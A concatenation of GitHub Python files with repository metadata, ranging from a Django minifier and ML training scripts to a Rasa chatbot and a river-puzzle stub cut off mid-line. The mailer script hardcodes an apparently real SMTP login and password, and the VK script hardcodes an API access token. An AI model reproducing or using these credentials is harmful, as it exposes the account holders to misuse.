response[\"Content-Type\"]:\n body_content: str = response.content.decode()\n minified_content: str = \"\"\n if USE_CACHE:\n cache_key: str = f\"{CACHE_PREFIX}{hash_func(response.content).hexdigest()}\"\n cached_page: typing.Optional[str] = cache_instance.get(cache_key)\n if cached_page:\n minified_content = cached_page\n else:\n minified_content = html_minify(body_content, REMOVE_COMMENTS)\n cache_instance.set(cache_key, minified_content, TIMEOUT)\n else:\n minified_content = html_minify(body_content, REMOVE_COMMENTS)\n response.content = minified_content.encode()\n return response\n","repo_name":"xfenix/django-hmin","sub_path":"hmin/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"39"} +{"seq_id":"14740315832","text":"import sys, collections\n\nN = int(sys.stdin.readline().rstrip())\nM = int(sys.stdin.readline().rstrip())\nINF = sys.maxsize\nP = collections.defaultdict(collections.defaultdict)\n\nfor _ in range(M):\n S, D, C = map(int, sys.stdin.readline().split())\n if S in P:\n if D in P[S]:\n P[S][D] = min(C, P[S][D])\n else:\n P[S][D] = C\n else:\n P[S][D] = C\n\nD = [INF for _ in range(N + 1)]\nstart, end = map(int, sys.stdin.readline().split())\n\ndef bfs(start):\n D[start] = 0\n queue = collections.deque()\n queue.append(start)\n visited = [True] + [False for _ in range(N)]\n\n while queue:\n cur = queue.popleft()\n visited[cur] = True\n if cur == end: \n return D[end]\n\n for next in P[cur].keys():\n if not visited[next]:\n left = D[cur] + P[cur][next]\n right = D[next]\n if left < right:\n D[next] = left\n \n min_index, min_distance = -1, INF\n for index in range(1, N + 1):\n if not visited[index]:\n if D[index] < min_distance:\n min_index, min_distance = index, D[index]\n queue.append(min_index)\n return D[end]\n\nprint(bfs(start))","repo_name":"PARKJUHONG123/coding-test","sub_path":"N1916.py","file_name":"N1916.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"20436105692","text":"#!/usr/bin/env python3\n# coding: UTF-8\n'''\n othermailer.py - Just another simple script to send emails via TLS\n Sergio Fernandez \n Usage: python3 othermailer.py --help\n'''\n\nimport sys\nimport smtplib\nimport argparse\nimport socket\nimport datetime\nfrom random import choice\nfrom string import ascii_lowercase, digits\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\n# Configure your sender settings\n#config = {\n# 'USER': \"user@domain\",\n# 'PASS': \"password\",\n# 'HOST': \"mail.host.name\",\n# 'PORT': \"587\"\n#}\n\nconfig = {\n 'USER': \"beserker@proyectopqmc.com\",\n 'PASS': \"beserker_99\",\n 'HOST': \"mail.gandi.net\",\n 'PORT': \"587\"\n}\n\n# Parse arguments about receiver\nPARSER = argparse.ArgumentParser()\nPARSER.add_argument(\"-s\", \"--subject\", help=\"Mail subject\", type=str)\nPARSER.add_argument(\"-t\", \"--to\", help=\"Destination emails, separated by comma\", type=str)\nPARSER.add_argument(\"-b\", \"--body\", help=\"Message body\", type=str)\nPARSER.add_argument(\"-a\", \"--attach\", help=\"Text file to attach\", type=str)\nARGS = PARSER.parse_args()\n\n# Headers values. In most cases, default values are ok for text-only content\nCHARSET = \"UTF-8\"\nMAILER_ID = \"Othermailer.py - https://github.com/ElAutoestopista/othermailer.py\"\nDATE_STR = datetime.datetime.now().strftime(\"%a, %d %b %Y %H:%M:%S %z\")\n\n# It's considered a good practice that MUA generates a message ID, so we are going to generate one randomly.\nHOSTNAME = socket.getfqdn()\nRAND_STR = ''.join(choice(ascii_lowercase + digits) for i in range(20))\nMessage_Id = \"<\"+RAND_STR+\"@\"+HOSTNAME+\">\"\n\n# Check arguments\nif ARGS.subject:\n Subject = ARGS.subject\nelse:\n print(\"No subject defined\")\n sys.exit(1)\nif ARGS.body:\n Msg = MIMEText(ARGS.body, 'plain')\nelse:\n print(\"No message defined\")\n sys.exit(1)\nif ARGS.to:\n To = [x.strip() for x in ARGS.to.split(',')]\nelse:\n print(\"No destination defined\")\n sys.exit(1)\nif ARGS.attach:\n try:\n f = open(ARGS.attach)\n Attachment = MIMEText(f.read())\n except Exception as e:\n print(e)\n sys.exit(1)\nelse:\n print(\"No file for attachment specified\")\n\n# Build message headers\nMessage = MIMEMultipart()\nMessage['From'] = config.get('USER')\nMessage['To'] = ','.join(To)\nMessage['Date'] = DATE_STR\nMessage['Subject'] = Subject\nMessage['Message-ID'] = Message_Id\nMessage['X-Mailer'] = MAILER_ID\nMessage['CHARSET'] = CHARSET\nMessage.attach(Msg)\nif ARGS.attach:\n Attachment.add_header('Content-Disposition', 'attachment', filename=ARGS.attach)\n Message.attach(Attachment)\n\n# Connect and try to send\ntry:\n Othermailer = smtplib.SMTP(config.get('HOST'), config.get('PORT'))\n Othermailer.ehlo()\n Othermailer.starttls()\n Othermailer.login(config.get('USER'), config.get('PASS'))\n Othermailer.sendmail(config.get('USER'), To, Message.as_string())\n print(\"Sent\")\nexcept smtplib.SMTPException as Error:\n print(\"ERROR: \" + Error)\n","repo_name":"SergioFernandezCordero/othermailer.py","sub_path":"othermailer.py","file_name":"othermailer.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"39839457669","text":"from __future__ import print_function, division, absolute_import\nimport argparse\nimport os\nimport shutil\nimport time\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nfrom collections import OrderedDict\nfrom efficientnet_pytorch import EfficientNet\n\nimport sys\nsys.path.append('.')\nfrom utils.utils import SceneData, FocalLoss, mixup\nfrom utils.model import create_model\nfrom mmcv import Config\nfrom utils.transform import image_transforms\n\nparser = argparse.ArgumentParser(description='PyTorch ImageNet Training')\nparser.add_argument('config', help='train config file path')\n\nargs = parser.parse_args()\ncfg = Config.fromfile(args.config)\n\ndef main():\n # global args, best_prec1, cfg \n model = create_model(cfg.model.arch, cfg.model.num_classes, cfg.model.pretrained)\n\n best_prec1 = 0\n # optionally resume from a checkpoint\n if cfg.resume:\n if os.path.isfile(cfg.resume):\n print(\"=> loading checkpoint '{}'\".format(cfg.resume))\n checkpoint = torch.load(cfg.resume)\n cfg.start_epoch = checkpoint['epoch']\n best_prec1 = checkpoint['best_prec1']\n state_dict = checkpoint['state_dict']\n \n new_state_dict = OrderedDict()\n for k, v in state_dict.items():\n name = k[7:]\n new_state_dict[name] = v\n\n model.load_state_dict(new_state_dict)\n print(\"=> loaded checkpoint '{}' (epoch {})\"\n .format(cfg.resume, checkpoint['epoch']))\n else:\n print(\"=> no checkpoint found at '{}'\".format(cfg.resume))\n\n cudnn.benchmark = True\n\n # Data loading code\n print(\"Loading data...\")\n traindir = os.path.join(cfg.data, 'train')\n valdir = os.path.join(cfg.data, 'val')\n\n train_loader = torch.utils.data.DataLoader(\n SceneData(txt_file=cfg.annotations.train, \n image_dir=cfg.data, \n mode='train', \n transform=image_transforms['train']),\n batch_size=cfg.batch_size, shuffle=True,\n num_workers=cfg.workers, pin_memory=True)\n\n val_loader = torch.utils.data.DataLoader(\n SceneData(txt_file=cfg.annotations.val,\n image_dir=cfg.data, \n mode='train', \n transform=image_transforms['val']),\n batch_size=cfg.batch_size, shuffle=False,\n num_workers=cfg.workers, pin_memory=True)\n\n # define loss function (criterion) and optimizer\n # criterion = nn.CrossEntropyLoss().cuda()\n criterion = FocalLoss(class_num=cfg.model.num_classes)\n\n optimizer = optim.SGD(model.parameters(), cfg.optimizer.learning_rate,\n momentum=cfg.optimizer.momentum,\n weight_decay=cfg.optimizer.weight_decay)\n\n\n model = torch.nn.DataParallel(model, device_ids=cfg.device_ids).cuda()\n # model = model.cuda()\n\n if cfg.evaluate:\n validate(val_loader, model, criterion)\n return\n\n for epoch in range(cfg.start_epoch, cfg.total_epochs):\n # train for one epoch\n train(train_loader, model, criterion, optimizer, epoch)\n\n # evaluate on validation set\n prec1 = validate(val_loader, model, criterion)\n\n # remember best prec@1 and save checkpoint\n is_best = prec1[0] > best_prec1\n best_prec1 = max(prec1[0], best_prec1)\n save_checkpoint({\n 'epoch': epoch + 1,\n 'arch': cfg.model.arch,\n 'state_dict': model.state_dict(),\n 'best_prec1': best_prec1,\n }, epoch, is_best, cfg.work_dir)\n\n\ndef train(train_loader, model, criterion, optimizer, epoch):\n \n batch_time = AverageMeter()\n data_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n # switch to train mode\n model.train()\n\n end = time.time()\n for i, (inputs, targets) in enumerate(train_loader):\n adjust_learning_rate(optimizer, cfg.optimizer.learning_rate, epoch)\n # measure data loading time\n data_time.update(time.time() - end)\n\n # targets = targets.cuda()\n # inputs = inputs.cuda()\n # inputs_var = torch.autograd.Variable(inputs)\n # targets_var = torch.autograd.Variable(targets)\n\n # # compute output\n # outputs = model(inputs_var)\n # loss = criterion(outputs, targets_var)\n\n # # measure accuracy and record loss\n # prec1, prec5 = accuracy(outputs.data, targets, topk=(1, 5))\n\n # mixup\n mixed_images, labels_a, labels_b, seed = mixup(inputs.numpy(), targets.numpy())\n inputs = torch.from_numpy(mixed_images).cuda()\n labels_a, labels_b = torch.from_numpy(labels_a).cuda(), torch.from_numpy(labels_b).cuda()\n\n outpus = model(inputs)\n loss = seed * criterion(outpus, labels_a) + (1-seed) * criterion(outpus, labels_b)\n \n prec1_1, prec1_5 = accuracy(outpus.data, labels_a, topk=(1, 5))\n prec2_1, prec2_5 = accuracy(outpus.data, labels_b, topk=(1, 5))\n prec1 = seed * prec1_1 + (1 - seed) * prec2_1\n prec5 = seed * prec1_5 + (1 - seed) * prec2_5\n\n losses.update(loss.data.item(), inputs.size(0))\n top1.update(prec1.item(), inputs.size(0))\n top5.update(prec5.item(), inputs.size(0))\n\n # compute gradient and do SGD step\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % cfg.log_config.print_freq == 0:\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Learning Rate {learning_rate:.4f}\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Acc@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Acc@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n epoch, i, len(train_loader), batch_time=batch_time,\n learning_rate=optimizer.param_groups[0]['learning_rate'], loss=losses, top1=top1, top5=top5))\n\n\ndef validate(val_loader, model, criterion):\n with torch.no_grad():\n batch_time = AverageMeter()\n losses = AverageMeter()\n top1 = AverageMeter()\n top5 = AverageMeter()\n\n # switch to evaluate mode\n model.eval()\n\n end = time.time()\n for i, (inputs, targets) in enumerate(val_loader):\n targets = targets.cuda()\n inputs = inputs.cuda()\n\n # compute output\n outputs = model(inputs)\n loss = criterion(outputs, targets)\n\n # measure accuracy and record loss\n prec1, prec5 = accuracy(outputs.data, targets.data, topk=(1, 5))\n losses.update(loss.data.item(), inputs.size(0))\n top1.update(prec1.item(), inputs.size(0))\n top5.update(prec5.item(), inputs.size(0))\n\n # measure elapsed time\n batch_time.update(time.time() - end)\n end = time.time()\n\n if i % cfg.log_config.print_freq == 0:\n print('Test: [{0}/{1}]\\t'\n 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Loss {loss.val:.4f} ({loss.avg:.4f})\\t'\n 'Acc@1 {top1.val:.3f} ({top1.avg:.3f})\\t'\n 'Acc@5 {top5.val:.3f} ({top5.avg:.3f})'.format(\n i, len(val_loader), batch_time=batch_time, loss=losses,\n top1=top1, top5=top5))\n\n print(' * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'\n .format(top1=top1, top5=top5))\n\n return top1.avg, top5.avg\n\n\ndef save_checkpoint(state, epoch, is_best, config, filename='checkpoint.pth.tar'):\n try:\n os.makedirs(config)\n except:\n pass\n torch.save(state, os.path.join(config, 'epoch_{:03d}.pth.tar'.format(epoch)))\n torch.save(state, os.path.join(config, filename))\n if is_best:\n shutil.copyfile(os.path.join(config, filename), os.path.join(config, 'model_best.pth.tar'))\n\ndef adjust_learning_rate(optimizer, learning_rate, epoch):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n learning_rate = learning_rate * (0.1 ** (epoch // 30))\n for param_group in optimizer.param_groups:\n param_group['learning_rate'] = learning_rate\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"mmmmmmiracle/img_cls_frame","sub_path":"tools/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"3502017692","text":"from fastapi import FastAPI, File, UploadFile\nfrom keras.models import load_model\nfrom keras.applications.vgg19 import preprocess_input\nimport numpy as np\nfrom PIL import Image\nimport io\nfrom pathlib import Path\n\n# Specify the path to your model file\nmodel_path = Path(\"model_vgg19.h5\")\n\n# Load the pre-trained model\nmodel = load_model(model_path)\n\n# Create a FastAPI app\napp = FastAPI()\n\n@app.post(\"/predict/\")\nasync def predict_image(file: UploadFile):\n try:\n # Check if the file is an image\n if file.content_type.startswith('image'):\n # Read and preprocess the image\n img = Image.open(io.BytesIO(await file.read()))\n img = img.resize((224, 224))\n x = np.array(img)\n x = np.expand_dims(x, axis=0)\n img_data = preprocess_input(x)\n\n # Make predictions\n classes = model.predict(img_data)\n malignant = classes[0, 0]\n normal = classes[0, 1]\n\n # Determine the result\n if malignant > normal:\n prediction = 'malignant'\n else:\n prediction = 'normal'\n\n return {\"prediction\": prediction}\n else:\n return {\"error\": \"Invalid file format, please provide an image.\"}\n except Exception as e:\n return {\"error\": \"Internal server error\"}\n\nif __name__ == \"__main__\":\n import os\n import uvicorn\n\n # Dynamically configure the port using the PORT environment variable\n port = int(os.environ.get(\"PORT\", 8000))\n uvicorn.run(app, host=\"0.0.0.0\", port=port)\n","repo_name":"AdeebCanCode/CancerAPI","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"7321408873","text":"import socket\r\nimport select\r\nimport threading\r\n\r\n\r\nclients = []\r\n\r\n\r\ndef handle_client(client_socket):\r\n data = client_socket.recv(1024)\r\n data = data.decode()\r\n print(data)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n server_socket.bind(('localhost', 6969))\r\n server_socket.listen(5)\r\n read_list = [server_socket]\r\n ready, blank1, blank2 = select.select(read_list, [], [])\r\n for sock in ready:\r\n if sock is server_socket:\r\n #if the socket we are currently checking is the randevoux socket,\r\n #we accept incoming connections and append to the ready list and perform whatever storing operations\r\n #of the clients\r\n c_socket, c_address = sock.accept()\r\n ready.append(c_socket)\r\n clients.append(c_socket)\r\n else:\r\n try:\r\n #here we create threads for all client sockets we have stored\r\n client_thread = threading.Thread(target=handle_client, args=(sock,))\r\n client_thread.start()\r\n clients.remove(sock)\r\n except socket.error as err:\r\n print(err)\r\n","repo_name":"911-LucianGabriel-Bratu/ComputerNetworks2022_2023","sub_path":"SimpleSelect/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"29785125433","text":"# Example file for working with conditional statements\n\ndef main():\n x, y = 10, 100\n \n if (x < y):\n st = \"x is less than y\"\n elif (x == y):\n st = \"x equal to y\"\n else:\n st = \"x is greater than y\"\n \n print (st)\n \n st = \"x is less than y\" if (x < y) else \"x is greater than or the same as y\"\n \n print (st)\nif __name__== \"__main__\":\n main()","repo_name":"Jevgenyij/Python2020","sub_path":"Conditionals_start.py","file_name":"Conditionals_start.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"35646678560","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport logging\nimport requests\nimport json\nfrom bs4 import BeautifulSoup\nimport bs4\nfrom rasa_core_sdk import Action\n#import register, step1, step2, step3\n\nimport sys\nsys.path.append('C:\\\\Users\\kxf\\Desktop\\Chatbot&Wealthbot')\nimport WealthbotConnection as wcon\nimport main2\nimport numpy as np\n\nlogger = logging.getLogger(__name__)\n\nclass ActionWealthbot2(Action):\n def name(self):\n return \"action_wealthbot2\"\n \n def run(self, dispatcher, tracker, domain): \n annual_income = tracker.get_slot('income')\n income_tax = tracker.get_slot('tax')\n employemt_type = tracker.get_slot('employ')\n liquid_net_worth = tracker.get_slot('networth')\n finanical_goal = tracker.get_slot('goal')\n expected_returns=tracker.get_slot('returns')\n would=tracker.get_slot('would')\n need=tracker.get_slot('need')\n\n \n text = main2.main(annual_income=annual_income, income_tax=income_tax, liquid_net_worth=liquid_net_worth, employment_type=employemt_type,\n financial_goal=finanical_goal, expected_returns=expected_returns,would =would, need =need,acount_money='1,111,111.00')\n soup = BeautifulSoup(text, 'html.parser')\n \n portfolio = ['your portfolio:']\n for tbody in soup.find('tbody'):\n if isinstance(tbody, bs4.element.Tag):\n tds = tbody('td')\n portfolio.append([tds[0].string, tds[1].string, tds[2].string])\n #portfolio.append('\\n')\n dispatcher.utter_message(str(portfolio))\n \n\nclass ActionWealthbot1(Action):\n def name(self):\n return \"action_wealthbot1\"\n \n def run(self, dispatcher, tracker, domain):\n email = tracker.get_slot('email')\n password = tracker.get_slot('password')\n response = wcon.login(email, password)\n print(response.text)\n soup = BeautifulSoup(response.text, 'html.parser')\n \n portfolio = ['your portfolio:']\n for tbody in soup.find(\"tbody\"):\n if isinstance(tbody, bs4.element.Tag):\n tds = tbody(\"td\")\n portfolio.append([tds[0].string, tds[1].string, tds[2].string])\n portfolio.append(['\\n'])\n dispatcher.utter_message(str(portfolio))\n \nclass ActionStockinfo(Action):\n def name(self):\n return \"action_stockinfo\"\n \n def run(self, dispatcher, tracker, domain):\n stock = tracker.get_slot('stock')\n\n url = 'https://gupiao.baidu.com/stock/'+'sz300370'+'.html'\n response = requests.get(url)\n response.encoding = 'utf-8'\n \n soup = BeautifulSoup(response.text, \"html.parser\")\n info = soup.find('div', attrs={'class':'stock-bets'})\n #stock = info.find_all(attrs={'class':'bets-content'})\n key = info.find_all('dt')\n value = info.find_all('dd')\n infoDic = {}\n for i in range(len(key)):\n k = key[i].text\n v = value[i].text\n infoDic[k] = v\n \n dispatcher.utter_message(str(infoDic))\n","repo_name":"chordou/chatbot-based-on-Rasa","sub_path":"Chatbot&Wealthbot/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"26591293813","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport nengo\nimport nengo_ocl\nimport os, inspect, sys\nimport socket\n\nocl = True #use openCL\nnengo_gui_on = __name__ == '__builtin__'\n\n\n#set path based on gui\nif nengo_gui_on:\n if sys.platform == 'darwin':\n cur_path = '/Users/Jelmer/Work/EM/MEG_fan/models/nengo/assoc_recog'\n elif socket.gethostname() == 'ai17864':\n \tcur_path = '/home/p234584/assoc_recog'\n else:\n cur_path = '/share/volume0/jelmer/MEG_fan/models/nengo/assoc_recog'\nelse:\n cur_path = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) # script path\n\n\n\n#open cl settings\nif sys.platform == 'darwin':\n os.environ[\"PYOPENCL_CTX\"] = \"0:1\"\nelif socket.gethostname() == 'ai17864':\n\tprint('ai comp')\nelse:\n os.environ[\"PYOPENCL_CTX\"] = \"0\"\n\t\n\n\n# define the model\nwith nengo.Network() as model:\n stim = nengo.Node(np.sin)\n a = nengo.Ensemble(100, 1)\n b = nengo.Ensemble(100, 1)\n nengo.Connection(stim, a)\n nengo.Connection(a, b, function=lambda x: x**2)\n\n probe_a = nengo.Probe(a, synapse=0.01)\n probe_b = nengo.Probe(b, synapse=0.01)\n\n# build and run the model\nwith nengo_ocl.Simulator(model) as sim:\n#with nengo.Simulator(model) as sim:\n sim.run(10)\n\n# plot the results\nplt.plot(sim.trange(), sim.data[probe_a])\nplt.plot(sim.trange(), sim.data[probe_b])\nplt.show()\n","repo_name":"tcstewar/assoc_recog","sub_path":"opencl_test.py","file_name":"opencl_test.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"27706955174","text":"import json\nimport pathlib\nimport wandb\n\nimport pandas as pd\nfrom pymongo import MongoClient\nimport configparser\nfrom sklearn.model_selection import train_test_split\n\n\nclass TrainingDataPrep:\n config = configparser.ConfigParser()\n\n def __init__(self):\n self.config.read(pathlib.Path(__file__).parent.parent / \"config\" / \"config.ini\")\n # Open connection to mongoDB\n self.conn = MongoClient(self.config[\"mongoDB\"][\"host\"])\n self.db = self.conn[self.config[\"mongoDB\"][\"db\"]]\n\n def build_training_df(self):\n df_rating = pd.DataFrame(list(self.db[\"rating\"].find()))\n df_watch = pd.DataFrame(list(self.db[\"watch_history\"].find()))\n df_movie = pd.DataFrame(list(self.db[\"movie\"].find()))\n df_user = pd.DataFrame(list(self.db[\"user\"].find()))\n df_user = df_user[[\"user_id\", \"gender\"]]\n\n df_movie = df_movie[\n [\n \"movie_id\",\n \"genres\",\n \"popularity\",\n \"runtime\",\n \"vote_average\",\n \"vote_count\",\n ]\n ]\n df = df_watch.merge(df_rating, how=\"left\", on=[\"user_id\", \"movie_id\"])\n df = df.merge(df_movie, how=\"inner\", on=[\"movie_id\"])\n df = df.merge(df_user, how=\"inner\", on=[\"user_id\"])\n\n # Extract genres\n df[\"genres\"] = df[\"genres\"].apply(lambda x: [ob[\"name\"] for ob in x])\n\n # Extract watch time percentage\n df[\"clips\"] = df[\"clips\"].apply(lambda x: len(x))\n df[\"watch_percentage\"] = df[\"clips\"] / df[\"runtime\"]\n\n # Add movie integer id\n movies = df[\"movie_id\"].unique()\n convert = {movie_id: i for i, movie_id in enumerate(movies)}\n df[\"movie_id_int\"] = df[\"movie_id\"].apply(lambda x: convert[x])\n\n df = df.drop([\"clips\", \"runtime\", \"_id_x\", \"_id_y\", \"timestamp\"], axis=1)\n return df\n\n def clean_training_data(self, df):\n df[\"rate\"] = df[\"rate\"].fillna(0)\n print(f'Number of unique users {len(df[\"movie_id\"].unique())}')\n print(f'Number of unique movies {len(df[\"user_id\"].unique())}')\n return df\n\n def pickle_training_data(self, df, use_wandb=True):\n df_train, df_test = train_test_split(df, test_size=0.1, random_state=1)\n df_train, df_val = train_test_split(df, test_size=0.2, random_state=1)\n df_train.to_pickle(self.config[\"TrainData\"][\"train_df_pkl_path\"])\n df_val.to_pickle(self.config[\"TrainData\"][\"val_df_pkl_path\"])\n df_test.to_pickle(self.config[\"TrainData\"][\"test_df_pkl_path\"])\n\n if use_wandb:\n run = wandb.init(\n project=\"movie-recs\",\n entity=\"movie-recs-team3\",\n job_type=\"data-preparation\",\n )\n\n artifact = wandb.Artifact(\"data-df\", type=\"data\")\n artifact.add_file(self.config[\"TrainData\"][\"train_df_pkl_path\"])\n artifact.add_file(self.config[\"TrainData\"][\"val_df_pkl_path\"])\n artifact.add_file(self.config[\"TrainData\"][\"test_df_pkl_path\"])\n run.log_artifact(artifact)\n run.finish()\n\n def unpickle_training_data(self, path):\n return pd.read_pickle(path)\n\n def run(self):\n df = self.build_training_df()\n df = self.clean_training_data(df)\n self.pickle_training_data(df)\n\n\nif __name__ == \"__main__\":\n trainingData = TrainingDataPrep()\n df = trainingData.build_training_df()\n df = trainingData.clean_training_data(df)\n","repo_name":"Luca-garnier/Movie-Recommendation-System","sub_path":"data/train_data_prep.py","file_name":"train_data_prep.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"74882927473","text":"import logging\n\nimport pytest\n\nimport roleml\n\n\ndef test_old_game_pro(pro_game, caplog):\n with caplog.at_level(logging.WARNING):\n roleml.predict(pro_game[\"game\"], pro_game[\"game\"][\"timeline\"])\n\n assert caplog.text\n\n\ndef test_recent_game(clean_game_na):\n with pytest.warns(None) as record:\n roleml.predict(clean_game_na[\"game\"], clean_game_na[\"game\"][\"timeline\"])\n\n assert not record\n","repo_name":"Canisback/roleML","sub_path":"tests/test_old_game.py","file_name":"test_old_game.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"39"} +{"seq_id":"11673963464","text":"from pprint import pprint\r\nimport requests\r\nimport time\r\nimport json\r\n\r\nAPP_ID = 6988731\r\n\r\nTOKEN = '73eaea320bdc0d3299faa475c196cfea1c4df9da4c6d291633f9fe8f83c08c4de2a3abf89fbc3ed8a44e1'\r\n\r\nuser_input = input()\r\ngroups_list = []\r\n\r\n\r\nclass User:\r\n def __init__(self, token):\r\n self.token = token\r\n\r\n def get_params(self):\r\n params = dict(\r\n access_token=self.token,\r\n v='5.95',\r\n extended=1,\r\n count=1000,\r\n fields=['members_count']\r\n )\r\n if type(user_input) == int:\r\n params['user_id'] = {user_input}\r\n else:\r\n params['screen_name'] = {user_input}\r\n return params\r\n\r\n def get_users_groups(self):\r\n params = self.get_params()\r\n response = requests.get(\r\n 'https://api.vk.com/method/groups.get',\r\n params\r\n )\r\n response_json = response.json()['response']['items']\r\n print('-')\r\n return response_json\r\n\r\n def get_unique_groups(self):\r\n users_groups = self.get_users_groups()\r\n for group in users_groups:\r\n group_dict = {\r\n 'name': group['name'],\r\n 'gid': group['id'],\r\n 'members_count': group['members_count']\r\n }\r\n params = dict(\r\n access_token=self.token,\r\n v='5.95',\r\n group_id={group['id']},\r\n count=1000,\r\n filter='friends'\r\n )\r\n try:\r\n response = requests.get(\r\n 'https://api.vk.com/method/groups.getMembers',\r\n params\r\n )\r\n except:\r\n time.sleep(3)\r\n else:\r\n response_json = response.json()\r\n if response_json['response']['count'] == 0:\r\n groups_list.append(group_dict)\r\n finally:\r\n print('-')\r\n\r\n with open('groups.json', 'w') as file:\r\n json.dump(groups_list, file, ensure_ascii=False, indent=2)\r\n\r\n with open('groups.json') as file:\r\n groups_json = json.load(file)\r\n pprint(groups_json)\r\n\r\n\r\nif __name__ == '__main__':\r\n user1 = User(TOKEN)\r\n user1.get_unique_groups()\r\n","repo_name":"obiwankenolya/py-diploma-baltsatu","sub_path":"py-diploma2.0.py","file_name":"py-diploma2.0.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"19117962806","text":"\"\"\"\nSolution stub for the River Problem.\n\nFill in the implementation of the `River_problem` class to match the\nrepresentation that you specified in problem XYZ.\n\"\"\"\nfrom searchProblem import Search_problem, Arc\n\n\n\nclass River_Node():\n \"\"\" This class defines the state representation as per the problem. \n \n Attributes:\n L = Left Side of River\n R = Right Side of River\n \"\"\"\n\n def __eq__(self, other):\n if self.L == other.L and self.R == other.R:\n return True\n\n return False\n\n def __str__(self):\n \"\"\" Generates the human readable representation of Node(Left,Right) of the class.\"\"\"\n return \"Node(L = {0}, R = {1})\".format(str(self.L), str(self.R))\n\n def __init__(self, L, R):\n \"\"\" Parameters should be a string of FCG.\n \n L = Left Side of River\n R = Right Side of River\n \"\"\"\n self.L = set(L)\n self.R = set(R)\n\nclass River_problem(Search_problem):\n def start_node(self):\n \"\"\"returns start node\"\"\"\n x = River_Node(\"FHGR\",\"\")\n return x\n \n def is_goal(self,node):\n \"\"\"is True if node is a goal\"\"\"\n \n return (set(\"FHGR\") == node.R)\n\n def neighbors(self,node):\n \"\"\"returns a list of the arcs for the neighbors of node\"\"\"\n \n valid_arcs = []\n temp_set = set(\"R\")\n\n # Build valid_arcs list and return.\n\n if \"R\" in node.L:\n \n # Add the option of just moving the cart if it creates a valid state.\n temp_node = River_Node(node.L - temp_set, node.R.union(temp_set))\n if self.is_valid_node(temp_node):\n valid_arcs.append(Arc(node, temp_node, 1, \"MOVE RAFT TO RIGHT\"))\n\n # For each \n for item in (node.L - set(\"R\")):\n new_temp_set = temp_set.union(set(item))\n new_temp_node = River_Node(node.L - new_temp_set, node.R.union(new_temp_set))\n\n if self.is_valid_node(new_temp_node):\n valid_arcs.append(Arc(node, new_temp_node, 1, \"PICKUP {0} AND MOVE TO RIGHT\".format(item)))\n\n if \"R\" in node.R:\n\n temp_node = River_Node(node.L.union(temp_set), node.R - temp_set)\n if self.is_valid_node(temp_node):\n valid_arcs.append(Arc(node, temp_node, 1, \"MOVE RAFT TO LEFT\"))\n\n for item in 